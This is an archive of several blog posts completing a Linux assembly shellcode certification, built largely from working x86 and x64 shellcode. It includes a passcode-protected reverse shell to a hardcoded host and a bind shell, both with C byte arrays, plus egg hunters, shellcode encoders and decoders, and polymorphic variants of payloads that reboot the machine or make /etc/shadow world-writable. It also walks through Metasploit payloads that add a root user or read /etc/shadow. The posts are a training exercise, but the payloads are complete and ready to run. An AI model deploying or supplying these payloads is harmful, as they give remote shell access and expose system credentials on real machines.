martes, 27 de mayo de 2014

[SLAEx64] IV Encoder/Decoder

Source: SecurityTube

How encoder work:

Get random number between 1-3 (link to python encoder script)
After add control number to shellcode, add junk bytes
Example:
-------------------------------------------------------------------------
| G | C | J | J | G | C | J | J | J | G |
-------------------------------------------------------------------------

G - good byte, shellcode byte
C - control number, help us control junk bytes to escape
J - Junk bytes

#!/usr/bin/python
from random import randint
#30 bytes
#shellcode - execve stack version
def get_random(ident):
    
    if ident == 'number':
        return randint(1,3)
    
    elif ident == 'char':
        return randint(65,122)#only [a-z[]\^_`A-Z]

shellcode  = ("\x31\xc0\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")
encoded = ""
#end     = "\\xf0\\x0d"

for x in bytearray(shellcode):
    
    encoded += '\\x%02x' % x
    
    random = get_random('number')
    encoded += '\\x%02x' % random
    
    for i in range(random-1):
        
        encoded += '\\x%02x' % get_random('char')

#encoded += end #probably we will need it for correct jump

print encoded
print 
print encoded.replace("\\x", ",0x")[1:]

print 'Initial len: %d, encoded len: %d' % (len(shellcode), 
    len(encoded)/4)

Decoder.nasm

section .text
global _start
_start:
        jmp short end ; jmp pop call
 
decoder:
 
        ; clean up the registers           

        pop rsi         ; get addr of shellcode putted by call starter
        push rsi        ; backup for call :D
 
        mov rdx, rsi    ; mov shellcode start addr to esi (source)
        mov rdi, rsi    ; mov shellcode start addr to edi (destination)
        inc rsi         ; point to the first dest byte, how many bytes we need to remove/espace
        inc rdi         ; point to the first random number
        
        push byte 0x53
        pop rcx ;83 - loop counter/your shellcode length, if you use diferent shellcode need adjust it
 
restore:
        xor rax, rax ;eax
        xor rbx, rbx ;ebx
 
        mov al, byte [rdi]  ; read distance to next byte
        add rax, rdi        ; eax = addr of the next valid byte
 
        mov bl, byte [rax]  ; bl = next valid byte of the shellcode
        mov byte [rdx], bl  ; move it to the final position
 
        mov rdi, rax        ; put latest valid pisition into edi 
        inc rdi             ; next distance
        inc rdx             ; next valid byte
 
        loop restore        ; loop
        
        pop rsi             ; call shellcode
        call rsi                       
 
end:
        call decoder  ; put shellcode addr into stack
        shelcode: db  0x48,0x01,0x31,0x01,0xc0,0x01,0x50,0x03,0x69,0x5b,0x48,0x01,0xbb,0x03,0x7a,0x4d,0x2f,0x03,0x60,0x49,0x62,0x01,0x69,0x01,0x6e,0x01,0x2f,0x02,0x58,0x2f,0x02,0x76,0x73,0x02,0x7a,0x68,0x01,0x53,0x03,0x71,0x62,0x48,0x01,0x89,0x02,0x7a,0xe7,0x01,0x50,0x03,0x6d,0x51,0x48,0x02,0x42,0x89,0x01,0xe2,0x02,0x51,0x57,0x03,0x71,0x59,0x48,0x02,0x54,0x89,0x01,0xe6,0x03,0x46,0x6c,0xb0,0x03,0x4b,0x61,0x3b,0x01,0x0f,0x02,0x71,0x05,0x01
SLAE64 - 1322

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

SecurityTube Linux Assembly Expert x64

lunes, 26 de mayo de 2014

[SLAEx64] III EggHunter

Source: SecurityTube

x32 bits EggHunter can be found here

;SLAE-1322 Andriy Brukhovetskyy
;egg hunting explained some techniques  
;http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf
;43 bytes

global _start
section .text
_start:

    xor rcx, rcx    ; 0
        
get_memory_block:
    ;getconf PAGE_SIZE in x64 is the same
    or dx, 0xfff    ; is the same as "add dx, 4095" (PAGE_SIZE)
        
checker:

    inc rdx         ; next memory offset
    push byte +0x15 ; __NR_access 21
    pop rax

    lea rbx, [rdx+8] ; alignment to validate the last four bytes of the signature
                     ; rcx already contains 0 (F_OK)
    syscall          ; syscall
    ;grep EFAULT /usr/include/asm-generic/errno-base.h
    ;bad address = EFAULT = 0xf2 = -14
    cmp al, 0xf2; because it's not a file

    jz get_memory_block ; if is not, loop

    mov rax, 0x5090509050905090 ; egg here in little endiant
    mov rdi, rdx
    
    scasq
    jnz checker ; return and search

    jmp rdi; if we here == we found the eggs, jump to our shellcode :)
SLAE64 - 1322

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

SecurityTube Linux Assembly Expert x64

domingo, 25 de mayo de 2014

[SLAEx64] II tcp_reverse_shell with passcode

Source: SecurityTube

This is x64 bits tcp reverse shell with passcode, if you need more explications, please check my post about x32 bits reverse shell, where you can found man about *nix socket programing

shell asm source

; Author Andriy Brukhovetskyy - doomedraven - SLAEx64 - 1322
; 138 bytes
global _start
section .text
_start:

    ;socket syscall
    push byte 0x29 ; 41 socket 
    pop rax    
    push byte 0x2 ; AF_INET
    pop rdi  
    push byte 0x1 ; SOCK_STREAM
    pop rsi    
    cdq ;rdx = 0 - ANY
    syscall
    
    xchg rdi, rax ; save socket descriptor
    
    mov dword [rsp-4], 0x0901a8c0 ; ip
    mov word [rsp-6], 0x5c11      ; port 4444
    mov byte [rsp-8], 0x02
    sub rsp, 8
    
    push byte 0x2a ; connect
    pop rax
    mov rsi, rsp   ; pointer    
    push byte 0x10 ; len
    pop rdx
    syscall

    push byte 0x3; counter 
    pop rsi

dup2_loop:
    dec rsi
    push byte 0x21
    pop rax
    syscall
    jnz dup2_loop ; jump if not 0

    ;read buffer
    mov rdi, rax ; socket
    cdq
    mov byte [rsp-1], al ;0 read
    sub rsp, 1
          
    push rdx 
    lea rsi, [rsp-0x10] ; 16 bytes from buf
    add dl, 0x10        ; size_t count
    syscall
    
    ;test passcode
    mov rax, 0x617264656d6f6f64 ; passcode 'doomedra'[::-1].encode('hex')
    push rdi                    ; save the socket
    lea rdi, [rsi]              ; load string from address
    scasq                       ; compare
    jz accepted_passwd          ; jump if equal
    
    ;exit if different :P
    push byte 0x3c 
    pop rax
    syscall

accepted_passwd:
    
    ;execve
    pop rdi; socket
    xor rax, rax
    mov rbx, 0x68732f2f6e69622f ;/bin//sh in reverse
    push rbx
    mov rdi, rsp
    push rax
    mov rdx, rsp
    push rdi 
    mov rsi, rsp
    add al, 0x3b
    syscall

C output

// 138 bytes 
unsigned char code[] =\
"\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x99\x0f\x05"
"\x48\x97\xc7\x44\x24\xfc"
"\xc0\xa8\x01\x09" //ip big endiant
"\x66\xc7\x44\x24\xfa"
"\x11\x5c" //port big endiant
"\xc6\x44\x24\xf8\x02\x48\x83"
"\xec\x08\x6a\x2a\x58\x48\x89\xe6\x6a\x10\x5a\x0f"
"\x05\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05"
"\x75\xf6\x48\x89\xc7\x99\x88\x44\x24\xff\x48\x83"
"\xec\x01\x52\x48\x8d\x74\x24\xf0\x80\xc2\x10\x0f"
"\x05\x48\xb8\x64\x6f\x6f\x6d\x65\x64\x72\x61\x57"
"\x48\x8d\x3e\x48\xaf\x74\x05\x6a\x3c\x58\x0f\x05"
"\x5f\x48\x31\xc0\x48\xbb\x2f\x62\x69\x6e\x2f\x2f"
"\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48"
"\x89\xe6\x04\x3b\x0f\x05";

Examples:

Correct passwd


Incorrect passwd


This shellcode was accepted to shell-storm.org and can be found here, special thank to @JonathanSalwan for accept it :)

SLAE64 - 1322

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

SecurityTube Linux Assembly Expert x64

sábado, 24 de mayo de 2014

[SLAEx64] tcp_bind_shell with passcode

Source: SecurityTube

This is x64 bits tcp bind shell with passcode, if you need more explications, please check my post about x32 bits bind shell, where you can found man about *nix socket programing

shell asm source

;Author - Andriy Brukhovetskyy - doomedraven - SLAEx64 - 1322
;175 bytes

global _start
section .text
_start:
    push byte 0x29 ; 41 - socket syscall 
    pop rax
    push byte 0x02 ; AF_INET
    pop rdi 
    push byte 0x01 ; SOCK_STREAM
    pop rsi
    cdq
    syscall
    
    ;copy socket descriptor to rdi for future use
    ;bind
    xchg rdi, rax
    xor rax, rax
    mov dword [rsp-4], eax    ;INADDR_ANY
    mov word  [rsp-6], 0x5c11 ;PORT 4444
    mov byte  [rsp-8], 0x2    ;AF_INET
    sub rsp, 0x8
    
    push byte 0x31 ;49 bind
    pop rax 
    mov rsi, rsp
    cdq
    add dl, 16 ;len
    syscall
    
    ;listen
    push byte 0x32 ;listen
    pop rax
    ;push byte 0x02 ;max clients
    ;pop rsi
    syscall
     
    push byte 0x2b ; accept
    pop rax
    sub rsp, 0x10  ; adjust
    xor rsi, rsi    
    mov rsi, rsp ; pointer
    mov byte [rsp-1], 0x10 ;len
    sub rsp, 0x01   ; adjust
    cdq
    mov rdx, rsp ; pointer
    syscall
        
    ;read buffer
    mov rdi, rax ; socket
    xor rax, rax
    mov byte [rsp-1], al ;0 read
    sub rsp, 1
    cdq      
    push rdx ; 0 stdin
    lea rsi, [rsp-0x10] ; 16 bytes from buffer
    add dl, 0x10        ; len
    syscall
    
    ;test passcode
    mov rax, 0x617264656d6f6f64 ; passcode 'doomedra'[::-1].encode('hex')
    push rdi                    ; save the socket
    lea rdi, [rsi]              ; load string from address
    scasq                       ; compare
    jz accepted_passwd          ; jump if equal
    
    ;exit if different :P
    xor rax, rax 
    add al, 60
    syscall

accepted_passwd:

    pop rdi; socket
    push byte 0x03
    pop rsi

dup2_loop:
    dec rsi
    push byte 0x21
    pop rax
    syscall
    jnz dup2_loop ; jump if not 0

    push rsi; 0
    
    ;execve
    ;push /bin//sh in reverse
    mov rbx, 0x68732f2f6e69622f
    push rbx
    
    mov rdi, rsp
    push rsi
    
    mov rdx, rsp
    push rdi 
    
    mov rsi, rsp
    push byte 0x3b
    pop rax
    syscall

C output

unsigned char code[] =\
"\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x99\x0f\x05\x48\x97\x48\x31\xc0\x89\x44\x24\xfc\x66\xc7\x44\x24\xfa\x11\x5c\xc6\x44\x24\xf8\x02\x48\x83\xec\x08\x6a\x31\x58\x48\x89\xe6\x99\x80\xc2\x10\x0f\x05\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x48\x83\xec\x10\x48\x31\xf6\x48\x89\xe6\xc6\x44\x24\xff\x10\x48\x83\xec\x01\x99\x48\x89\xe2\x0f\x05\x48\x89\xc7\x48\x31\xc0\x88\x44\x24\xff\x48\x83\xec\x01\x99\x52\x48\x8d\x74\x24\xf0\x80\xc2\x10\x0f\x05\x48\xb8\x64\x6f\x6f\x6d\x65\x64\x72\x61\x57\x48\x8d\x3e\x48\xaf\x74\x07\x48\x31\xc0\x04\x3c\x0f\x05\x5f\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x56\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x56\x48\x89\xe2\x57\x48\x89\xe6\x6a\x3b\x58\x0f\x05";


Examples:

Correct passwd


Incorrect passwd


This shellcode was accepted to shell-storm.org and can be found here, special thank to @JonathanSalwan for accept it :)


SLAE64 - 1322

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

SecurityTube Linux Assembly Expert x64

martes, 13 de mayo de 2014

[SLAE] VI - Polymorphic

Source: SecurityTube

I recommend check this article Polymorphic Shellcode Engine Using Spectrum Analysis


;26 bytes
;Shellcode : linux/x86 File unlinker 18 bytes + file path length
global _start
section .text
_start:

    jmp one

two
    pop ebx
    ;mov al, 0xa ;[ORIGIN]
    mov al, 0x7  ;[NEW]
    add al,  0x5 ;[NEW]
    sub al,  0x2 ;[NEW]
    int 0x80

    mov al, 01
    xor ebx, ebx
    int 0x80

one:
    call two
    file: db 0xaa, 0xbb, 0xcc, 0xdd; <- your file here
Original here

;46 bytes
;Shellcode Linux x86 PUSH reboot()
global _start
section .text
_start:

    xor eax, eax
    push eax
    
    ;push 0x746f6f62; toob [ORIGINAL]
    mov esi, 0x746f6c59   ; [NEW]
    add si,  0x309        ; [NEW]
    mov dword [esp-4], esi; [NEW]
    sub esp, 4            ; [NEW]
    push 0x65722f6e  ; er/n [ORIGINAL]
    
    push 0x6962732f; ibs/[ORIGINAL]

    mov ebx, esp
    push eax; 0

    mov edx, esp
    push ebx

    mov ecx, esp
    mov al, 0xb; [ORIGINAL]
    mov al, 0x6; [NEW]
    add al, 0x5; [NEW] 11 = NR_execve

    int 0x80     
Original here

;Linux/x86 - chmod() 666 /etc/shadow & exit()

;39 bytes shellcode
global _start
section .text
_start:

    push ecx
    mov cx, 0x1b6; = 438
    ;push 0x776f6461; woda [ORIGINAL]
    mov esi, 0x776f6158;   [NEW]
    add si, 0x309 ;  woda  [NEW]
    mov dword [esp-4], esi;[NEW]
    push 0x68732f63; hs/c
    push 0x74652f2f; te//
    mov ebx, esp ;save pointer
    push 0xf     ;chmod
    pop eax      ;15
    int 0x80
    inc eax ;exit
    int 0x80
Original here

SLAE-513

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:


sábado, 10 de mayo de 2014

[SLAE] V-3 Analyzing Metasploit linux/x86/shell_bind_tcp_random_port payload

Source: SecurityTube


I explain every line witch need explication, I hope it's explained enough, if you don't understand something, leave me a commend and I will explain/respond to all questions.

1) We need generate our payload for post analysis
msfpayload linux/x86/shell_bind_tcp_random_port C
/*
 * linux/x86/shell_bind_tcp_random_port - 57 bytes
 * http://www.metasploit.com
 * VERBOSE=false, PrependFork=false, PrependSetresuid=false, 
 * PrependSetreuid=false, PrependSetuid=false, 
 * PrependSetresgid=false, PrependSetregid=false, 
 * PrependSetgid=false, PrependChrootBreak=false, 
 * AppendExit=false
 */
unsigned char payload[] = 
"\x31\xdb\xf7\xe3\xb0\x66\x43\x52\x53\x6a\x02\x89\xe1\xcd\x80"
"\x52\x50\x89\xe1\xb0\x66\xb3\x04\xcd\x80\xb0\x66\x43\xcd\x80"
"\x59\x93\x6a\x3f\x58\xcd\x80\x49\x79\xf8\xb0\x0b\x68\x2f\x2f"
"\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\xcd\x80";

compilation - gcc -ggdb -z execstack -fno-stack-protector shellcode.c -o shellcode
Source of .C code can be found here
For start I recommend to you check this my post about Bind shell
2) Analyzing with GDB

gdb -q ./shellcode

=> 0x0804a040 <+0>:        xor    ebx,ebx ; 0
   0x0804a042 <+2>:        mul    ebx     ; 0
   0x0804a044 <+4>:        mov    al,0x66 ; 102 == socketcall 
   0x0804a046 <+6>:        inc    ebx     ; 1   == sys_socket  -> int socket (int family, int type, int protocol);
   0x0804a047 <+7>:        push   edx     ; 0 == system default(tcp/upd) - int protocol
   0x0804a048 <+8>:        push   ebx     ; 1 == SOCK_STREAM 
   0x0804a049 <+9>:        push   0x2     ; 2 == AF_INET - int family
   0x0804a04b <+11>:       mov    ecx,esp ; save pointer to args
   0x0804a04d <+13>:       int    0x80    ; syscall
   0x0804a04f <+15>:       push   edx     ; 0
   0x0804a050 <+16>:       push   eax     ; 7
   0x0804a051 <+17>:       mov    ecx,esp ; save pointer
   0x0804a053 <+19>:       mov    al,0x66 ; 102 == socketcall
   0x0804a055 <+21>:       mov    bl,0x4  ; 4   == sys_listen
   0x0804a057 <+23>:       int    0x80    ; syscall
   0x0804a059 <+25>:       mov    al,0x66 ; 102 == socketcall
   0x0804a05b <+27>:       inc    ebx     ; 5   == sys_accept as we no pass port, it well be random check man accept for more information
   0x0804a05c <+28>:       int    0x80    ; syscall
   0x0804a05e <+30>:       pop    ecx     ; 7
   0x0804a05f <+31>:       xchg   ebx,eax ; ebx = 8, eax = 5
   0x0804a060 <+32>:       push   0x3f    ; 63
   0x0804a062 <+34>:       pop    eax     ; eax = 63 = dup2 redirrect STDIN/STDOUT/STDERR here they
                                                         do this bucle 8 times from 7 to 0
   0x0804a063 <+35>:       int    0x80       ; syscall
   0x0804a065 <+37>:       dec    ecx        ; ecx -1
   0x0804a066 <+38>:       jns    0x804a060  if ecx > 0 jump to <+32>
   0x0804a068 <+40>:       mov    al,0xb     ; 11 == execve
   0x0804a06a <+42>:       push   0x68732f2f ; hs//
   0x0804a06f <+47>:       push   0x6e69622f ; nib/ <- /bin/sh start
   0x0804a074 <+52>:       mov    ebx,esp    ; save pointer to /bin/bash
   0x0804a076 <+54>:       inc    ecx        ; 0
   0x0804a077 <+55>:       int    0x80       ; syscall
   0x0804a079 <+57>:       add    BYTE PTR [eax],al

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

SLAE-513

[SLAE] V-2 Analyzing Metasploit linux/x86/adduser payload

Source: SecurityTube


I explain every line witch need explication, I hope it's explained enough, if you don't understand something, leave me a commend and I will explain/respond to all questions.

1) We need generate our payload for post analysis
msfpayload linux/x86/adduser USER=doomedraven PASS=rulez C
/*
 * linux/x86/adduser - 98 bytes
 * http://www.metasploit.com
 * VERBOSE=false, PrependFork=false, PrependSetresuid=false, 
 * PrependSetreuid=false, PrependSetuid=false, 
 * PrependSetresgid=false, PrependSetregid=false, 
 * PrependSetgid=false, PrependChrootBreak=false, 
 * AppendExit=false, USER=doomedraven, PASS=rulez, 
 * SHELL=/bin/sh
 */
unsigned char payload[] =\
"\x31\xc9\x89\xcb\x6a\x46\x58\xcd\x80\x6a\x05\x58\x31\xc9\x51"
"\x68\x73\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63"
"\x89\xe3\x41\xb5\x04\xcd\x80\x93\xe8\x29\x00\x00\x00\x64\x6f"
"\x6f\x6d\x65\x64\x72\x61\x76\x65\x6e\x3a\x41\x7a\x56\x73\x58"
"\x48\x68\x50\x44\x73\x74\x56\x51\x3a\x30\x3a\x30\x3a\x3a\x2f"
"\x3a\x2f\x62\x69\x6e\x2f\x73\x68\x0a\x59\x8b\x51\xfc\x6a\x04"
"\x58\xcd\x80\x6a\x01\x58\xcd\x80";

compilation - gcc -ggdb -z execstack -fno-stack-protector shellcode.c -o shellcode
source of .C code can be found here

2) Analyzing with GDB

gdb -q ./shellcode

(gdb) disassemble 
Dump of assembler code for function payload:
=> 0x0804a040 <+0>:        xor    ecx,ecx; 0
   0x0804a042 <+2>:        mov    ebx,ecx; 0
   0x0804a044 <+4>:        push   0x46   ; 70 = __NR_setreuid -> man setreuid
   0x0804a046 <+6>:        pop    eax    ; get 70 
   0x0804a047 <+7>:        int    0x80   ; syscall return -1 = error
   0x0804a049 <+9>:        push   0x5    ; 5
   0x0804a04b <+11>:       pop    eax    ; eax = 0x5 = __NR_open -> man 2 setreuid
   0x0804a04c <+12>:       xor    ecx,ecx; exc = 0
   0x0804a04e <+14>:       push   ecx    ; 0
   0x0804a04f <+15>:       push   0x64777373 ; dwss
   0x0804a054 <+20>:       push   0x61702f2f ; ap// <- 2 / becouse is not importand here and we need 4 byte
   0x0804a059 <+25>:       push   0x6374652f ; cte/ <- start of /etc/passwd
   0x0804a05e <+30>:       mov    ebx,esp    ; save pointer to /etc/passwd
   0x0804a060 <+32>:       inc    ecx        ; 1 == O_WRONLY <- /usr/include/asm-generic/fcntl.h
   0x0804a061 <+33>:       mov    ch,0x4     ; 0x401 == 1025 = xor 02000,01 == O_APPEND <- /usr/include/asm-generic/fcntl.h
   0x0804a063 <+35>:       int    0x80       ; syscall return -13
   0x0804a065 <+37>:       xchg   ebx,eax    ; save syscall response into ebx
   0x0804a066 <+38>:       call   0x804a094 
   0x0804a06b <+43>:       outs   dx,DWORD PTR fs:[esi]
   0x0804a06d <+45>:       outs   dx,DWORD PTR ds:[esi]
   0x0804a06e <+46>:       ins    DWORD PTR es:[edi],dx
   0x0804a06f <+47>:       gs
   0x0804a070 <+48>:       fs
   0x0804a071 <+49>:       jb     0x804a0d4
   0x0804a073 <+51>:       jbe    0x804a0da
   0x0804a075 <+53>:       outs   dx,BYTE PTR ds:[esi]
   0x0804a076 <+54>:       cmp    al,BYTE PTR [ecx+0x7a]
   0x0804a079 <+57>:       push   esi
   0x0804a07a <+58>:       jae    0x804a0d4
   0x0804a07c <+60>:       dec    eax
   0x0804a07d <+61>:       push   0x74734450
   0x0804a082 <+66>:       push   esi
   0x0804a083 <+67>:       push   ecx
   0x0804a084 <+68>:       cmp    dh,BYTE PTR [eax]
   0x0804a086 <+70>:       cmp    dh,BYTE PTR [eax]
   0x0804a088 <+72>:       cmp    bh,BYTE PTR [edx]
   0x0804a08a <+74>:       das    
   0x0804a08b <+75>:       cmp    ch,BYTE PTR [edi]
   0x0804a08d <+77>:       bound  ebp,QWORD PTR [ecx+0x6e]
   0x0804a090 <+80>:       das    
   0x0804a091 <+81>:       jae    0x804a0fb
   0x0804a093 <+83>:       or     bl,BYTE PTR [ecx-0x75]
   0x0804a096 <+86>:       push   ecx
   0x0804a097 <+87>:       cld    
   0x0804a098 <+88>:       push   0x4 
   0x0804a09a <+90>:       pop    eax  ; 4  == __NR_write == write(int fd, const void *buf, size_t count);
   0x0804a09b <+91>:       int    0x80 ; syscall 
   0x0804a09d <+93>:       push   0x1   
   0x0804a09f <+95>:       pop    eax  ; 1 exit
   0x0804a0a0 <+96>:       int    0x80 ; syscall
   0x0804a0a2 <+98>:       add    BYTE PTR [eax],al
End of assembler dump.

3) Looking with Ndisasm

User:doomedraven
Passwd: import crypt; crypt.crypt('rules', 'Az');'Azble21jpm/n6'

msfpayload -p linux/x86/adduser user=doomedraven pass=rules R | ndisasm -
->removed 
00000029  0000              add [bx+si],al;0
0000002B  646F              fs outsw      ;do <- start username
0000002D  6F                outsw         ;o
0000002E  6D                insw          ;m
0000002F  65647261          fs jc 0x94    ;edra
00000033  7665              jna 0x9a      ;ve
00000035  6E                outsb         ;n
00000036  3A417A            cmp al,[bx+di+0x7a];:Az  <- start passwd
00000039  626C65            bound bp,[si+0x65] ;ble
0000003C  3231              xor dh,[bx+di]     ;21
0000003E  6A70              push byte +0x70    ;jp
00000040  6D                insw               ;m
00000041  2F                das                ;/
00000042  6E                outsb              ;n
00000043  363A30            cmp dh,[ss:bx+si]  ;6:0 <- passwd end and id
00000046  3A30              cmp dh,[bx+si]     ;:0
00000048  3A3A              cmp bh,[bp+si]     ;::
0000004A  2F                das                ;/
0000004B  3A2F              cmp ch,[bx]        ;:/
0000004D  62696E            bound bp,[bx+di+0x6e];bin
00000050  2F                das                  ;/
00000051  7368              jnc 0xbb             ;sh
00000053  0A598B            or bl,[bx+di-0x75]   ;
->removed

SLAE-513

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:


viernes, 9 de mayo de 2014

[SLAE] V-1 Analyzing Metasploit linux/x86/exec payload

Source: SecurityTube


I explain every line witch need explication, I hope it's explained enough, if you don't understand something, leave me a commend and I will explain/respond to all questions.

1) We need generate our payload for post analysis
msfpayload linux/x86/exec CMD='cat /etc/shadow' C
/*
 * linux/x86/exec - 51 bytes
 * http://www.metasploit.com
 * VERBOSE=false, PrependFork=false, PrependSetresuid=false, 
 * PrependSetreuid=false, PrependSetuid=false, 
 * PrependSetresgid=false, PrependSetregid=false, 
 * PrependSetgid=false, PrependChrootBreak=false, 
 * AppendExit=false, CMD=cat /etc/shadow
 */
unsigned char buf[] = 
"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"
"\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x10\x00\x00\x00\x63"
"\x61\x74\x20\x2f\x65\x74\x63\x2f\x73\x68\x61\x64\x6f\x77\x00"
"\x57\x53\x89\xe1\xcd\x80";

compilation - gcc -ggdb -z execstack -fno-stack-protector shellcode.c -o shellcode
source of .C code can be found here: https://github.com/doomedraven/SLAE/tree/master/SLAEx32/Assignment%205

2) Analyzing with GDB

gdb -q ./shellcode

=> 0x0804a040 <+0>:        push   0xb    ; 11 -> __NR_execve
   0x0804a042 <+2>:        pop    eax
   0x0804a043 <+3>:        cdq           ; convert double to quad
   0x0804a044 <+4>:        push   edx    ; 0
   0x0804a045 <+5>:        pushw  0x632d ; .decode('hex') -> '-c'
   0x0804a049 <+9>:        mov    edi,esp; save pointer to -c 
   0x0804a04b <+11>:       push   0x68732f  ; hs/
   0x0804a050 <+16>:       push   0x6e69622f; nib/
   0x0804a055 <+21>:       mov    ebx,esp   ; save pointer to /bin/bash
   0x0804a057 <+23>:       push   edx
   0x0804a058 <+24>:       call   0x804a06d ; jump to 0x0804a06d <+45>
   0x0804a05d <+29>:       arpl   WORD PTR [ecx+0x74],sp 
   0x0804a060 <+32>:       and    BYTE PTR [edi],ch       
   0x0804a062 <+34>:       gs                             
   0x0804a063 <+35>:       je     0x804a0c8
   0x0804a065 <+37>:       das    
   0x0804a066 <+38>:       jae    0x804a0d0
   0x0804a068 <+40>:       popa   
   0x0804a069 <+41>:       outs   dx,DWORD PTR fs:[esi]
   0x0804a06b <+43>:       ja     0x804a06d 
   0x0804a06d <+45>:       push   edi     ; jump here and push pointer to -c
   0x0804a06e <+46>:       push   ebx     ; push point to start of  /bin
   0x0804a06f <+47>:       mov    ecx,esp ; save pointer
   0x0804a071 <+49>:       int    0x80    ; syscall
   0x0804a073 <+51>:       add    BYTE PTR [eax],al
End of assembler dump.

3) Looking with Ndisasm

msfpayload -p linux/x86/exec cmd='cat /etc/shadow' R | ndisasm -
-> removed
00000018  E81000            call word 0x2b
0000001B  0000              add [bx+si],al
0000001D  636174            arpl [bx+di+0x74],sp ;cat
00000020  202F              and [bx],ch          ; /
00000022  657463            gs jz 0x88           ;etc
00000025  2F                das                  ;/
00000026  7368              jnc 0x90             ;sh
00000028  61                popaw                ;a
00000029  646F              fs outsw             ;do
0000002B  7700              ja 0x2d              ;w0
-> removed

4) Generating .dot graph with Libemu

SLAE-513

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:


martes, 6 de mayo de 2014

[SLAE] IV Simple Encoder/decoder

Source: SecurityTube

Ok, here I will show simple Enconder/decoder, source code can be found in github.
How encoder work:

  1. Get random number between 1-3 (link to python encoder script)
  2. After add control number to shellcode, add junk bytes
Example:
------------------------------------------------------------------
|  G   |  C   |   J   |   J   |  G   |   C  |  J   |  J   |   J   |   G |
------------------------------------------------------------------

G - good byte, shellcode byte
C - control number, help us control junk bytes to escape
J - Junk bytes

#!/usr/bin/python
from random import randint
#30 bytes
#shellcode - execve stack version
def get_random(ident):
    
    if ident == 'number':
        return randint(1,3)
    
    elif ident == 'char':
        return randint(65,122)#only [a-z[]\^_`A-Z]

shellcode  = ("\x31\xc0\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")
encoded = ""
#end     = "\\xf0\\x0d"

for x in bytearray(shellcode):
    
    encoded += '\\x%02x' % x
    
    random = get_random('number')
    encoded += '\\x%02x' % random
    
    for i in range(random-1):
        
        encoded += '\\x%02x' % get_random('char')

#encoded += end #probably we will need it for correct jump

print encoded
print 
print encoded.replace("\\x", ",0x")[1:]

print 'Initial len: %d, encoded len: %d' % (len(shellcode), 
    len(encoded)/4)

Decoder.nasm
section .text
global _start
_start:
        jmp short end ; jmp pop call
 
decoder:
 
        xor eax, eax    ; clean up the registers
        xor ebx, ebx
        xor edx, edx
        xor ecx, ecx
 
        pop edx         ; get addr of shellcode putted by call starter
        push edx        ; backup for call :D
 
        mov esi, edx    ; mov shellcode start addr to esi (source)
        mov edi, edx    ; mov shellcode start addr to edi (destination)
        inc esi         ; point to the first dest byte, how many bytes we need to remove/espace
        inc edi         ; point to the first random number
        
        mov cl, 89      ; loop counter/your shellcode length, if you use diferent shellcode need adjust it
 
restore: ;decode
        xor eax, eax
        xor ebx, ebx
 
        mov al, byte [edi]  ; read distance to next byte
        add eax, edi        ; eax = addr of the next valid byte
 
        mov bl, byte [eax]  ; bl = next valid byte of the shellcode
        mov byte [esi], bl  ; move it to the final position
 
        mov edi, eax        ; put latest valid pisition into edi 
        inc edi             ; next distance
        inc esi             ; next valid byte
 
        loop restore        ; loop
        
        pop ecx             ; call shellcode
        call ecx            
 
        xor eax, eax        ; exit the shellcode (if it returns)
        mov al, 1           
        xor ebx,ebx         
        int 0x80            
 
end:
        call decoder  ; put shellcode addr into stack
        shelcode: db 0x31,0x01,0xc0,0x03,0x7a,0x6b,0x50,0x03,0x76,0x50,0x68,0x02,0x4f,0x62,0x03,0x6c,0x49,0x61,0x01,0x73,0x01,0x68,0x02,0x54,0x68,0x01,0x62,0x03,0x5e,0x7a,0x69,0x01,0x6e,0x01,0x2f,0x03,0x54,0x48,0x68,0x01,0x2f,0x03,0x47,0x4d,0x2f,0x01,0x2f,0x01,0x2f,0x01,0x89,0x03,0x4a,0x62,0xe3,0x01,0x50,0x02,0x42,0x89,0x02,0x63,0xe2,0x02,0x62,0x53,0x03,0x4f,0x41,0x89,0x01,0xe1,0x03,0x72,0x5b,0xb0,0x03,0x48,0x66,0x0b,0x02,0x61,0xcd,0x02,0x4f,0x80,0x03,0x41,0x4e

SLAE-513

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:


lunes, 5 de mayo de 2014

[SLAE] III Egg Hunting

Source: SecurityTube


I found a very interesting document explained different techniques of Egg hunting, in this document explained how to search it in Windows and Linux, you can found this document here. I really recommend read this paper if you want know how it works
;SLAE-513 Andriy Brukhovetskyy
;egg hunting explained some techniques  
;http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf
;35 bytes

global _start
section .text
_start:

    xor ecx, ecx    ; 0
        
get_memory_block:
    or dx, 0xfff    ; is the same as "add dx, 4095" (PAGE_SIZE)
        
checker:

    inc edx         ; next memory offset
    push byte +0x21 ; __NR_access 33
    pop eax

    lea ebx, [edx+4] ; alignment to validate the last four bytes of the signature
                     ; ecx already contains 0 (F_OK)
    int 0x80         ; syscall

    ; bad address = EFAULT = 0xf2 = -14
